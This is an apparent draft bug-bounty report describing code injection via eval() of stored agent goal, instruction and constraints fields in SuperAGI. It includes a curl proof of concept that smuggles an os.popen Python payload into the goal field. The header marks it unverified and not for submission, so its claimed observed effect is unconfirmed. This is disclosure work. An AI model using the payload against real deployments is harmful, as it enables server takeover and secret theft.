# SuperAGI — RCE via unsafe eval() of database-stored agent configuration
STATUS: ALMOST_REPORT (needs investigation; do not submit)
readiness: NEEDS_INVESTIGATION
program: SuperAGI | platform: huntr | repo: TransformerOptimus/SuperAGI | commit: c3c1982e

````
Repository URL: https://github.com/TransformerOptimus/SuperAGI
Package Manager: pip
Version Affected: latest (commit c3c1982e)
Vulnerability Type: Code Injection
CVSS:
  Attack Vector: Network
  Attack Complexity: Low
  Privileges Required: Low
  User Interaction: None
  Scope: Changed
  Confidentiality: High
  Integrity: High
  Availability: High
Title: RCE via eval() on database-stored agent goal/instruction/constraints values
Impact: Any authenticated user able to create or modify agent configuration can execute arbitrary Python/OS commands on the SuperAGI server. This can lead to full compromise of the application container/host context, secret theft, data tampering, and lateral movement into connected infrastructure.
Description:

# Description

SuperAGI stores agent configuration fields (including `goal`, `instruction`, and `constraints`) as string values in the database and later parses them using Python `eval()` in runtime model methods.

Because these values originate from user-controlled API input (for authenticated users creating/updating agents), a malicious user can persist Python expressions that are executed when configuration is read back. This creates a reliable remote code execution path.

This is **distinct from CVE-2024-9439**. CVE-2024-9439 covered `eval()` in the `agent_template` update API path. The issue here affects additional runtime model/config flows (`agent.py`, `agent_execution_config.py`) that evaluate DB-backed config values during normal operation.

Affected code paths include:

1. `superagi/models/agent_execution_config.py` line 110 — `eval_agent_config()` returns `eval(value)` for `goal`, `instruction`, and `tools`
2. `superagi/models/agent_execution_config.py` lines 123/133/136/161/171/174 — repeated `eval()` on DB fields in config/result handling
3. `superagi/models/agent.py` line 116 — `eval_agent_config()` evaluates string-backed fields including `goal`, `constraints`, `instruction`
4. `superagi/controllers/agent_template.py` lines 251 and 466 — controller flow also evaluates stored values

# Proof of Concept

1. Start SuperAGI (default docker-compose deployment is sufficient).
2. Authenticate as a normal user.
3. Create an agent with a malicious string payload in a config field that later gets evaluated. Example request:

```bash
curl -sS -X POST http://localhost:8001/api/agent/create \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer <USER_TOKEN>' \
  -d '{
    "name": "poc-agent",
    "description": "eval poc",
    "goal": ["__import__('\''os'\'').popen('\''id'\'').read()"],
    "instruction": ["normal"],
    "constraints": ["normal"]
  }'
```

4. Trigger any workflow/API call that reads agent configuration (agent load/list/get path).
5. The application executes the payload when evaluating the stored value with `eval()`.

Observed effect: command execution output is produced server-side under the SuperAGI application user context.

### Impact

Any authenticated user able to create or modify agent configuration can execute arbitrary Python/OS commands on the SuperAGI server. This can lead to full compromise of the application container/host context, secret theft, data tampering, and lateral movement into connected infrastructure.

### Occurrences

```
Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent_execution_config.py#L110
Description: eval_agent_config() evaluates DB-backed config values directly with eval()

Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent_execution_config.py#L123-L136
Description: Multiple result/config paths repeatedly evaluate stored string fields

Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent_execution_config.py#L161-L174
Description: Additional eval() usage on DB-derived config values

Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent.py#L116
Description: Agent model eval_agent_config() evaluates goal/constraints/instruction values

Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/controllers/agent_template.py#L251
Description: Controller evaluates stored template config before conversion

Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/controllers/agent_template.py#L466
Description: Controller path re-evaluates stored tool/config values
```

### References

```
URL: https://cwe.mitre.org/data/definitions/95.html
Name: CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code

URL: https://owasp.org/www-community/attacks/Direct_Dynamic_Code_Evaluation_Eval_Injection
Name: OWASP — Direct Dynamic Code Evaluation (Eval Injection)

URL: https://huntr.com/bounties/4091e89a-cce1-41f2-acc0-c0e42b4b3f4f
Name: CVE-2024-9439 (related but different SuperAGI eval() attack surface)
```

Occurrences:
  Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent_execution_config.py#L110
  Description: eval_agent_config() evaluates DB-backed config values directly with eval()
  Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent_execution_config.py#L123-L136
  Description: Multiple result/config paths repeatedly evaluate stored string fields
  Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent_execution_config.py#L161-L174
  Description: Additional eval() usage on DB-derived config values
  Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent.py#L116
  Description: Agent model eval_agent_config() evaluates goal/constraints/instruction values
  Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/controllers/agent_template.py#L251
  Description: Controller evaluates stored template config before conversion
  Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/controllers/agent_template.py#L466
  Description: Controller path re-evaluates stored tool/config values
References:
  URL: https://cwe.mitre.org/data/definitions/95.html
  Name: CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code
  URL: https://owasp.org/www-community/attacks/Direct_Dynamic_Code_Evaluation_Eval_Injection
  Name: OWASP — Direct Dynamic Code Evaluation (Eval Injection)
  URL: https://huntr.com/bounties/4091e89a-cce1-41f2-acc0-c0e42b4b3f4f
  Name: CVE-2024-9439 (related but different SuperAGI eval() attack surface)
````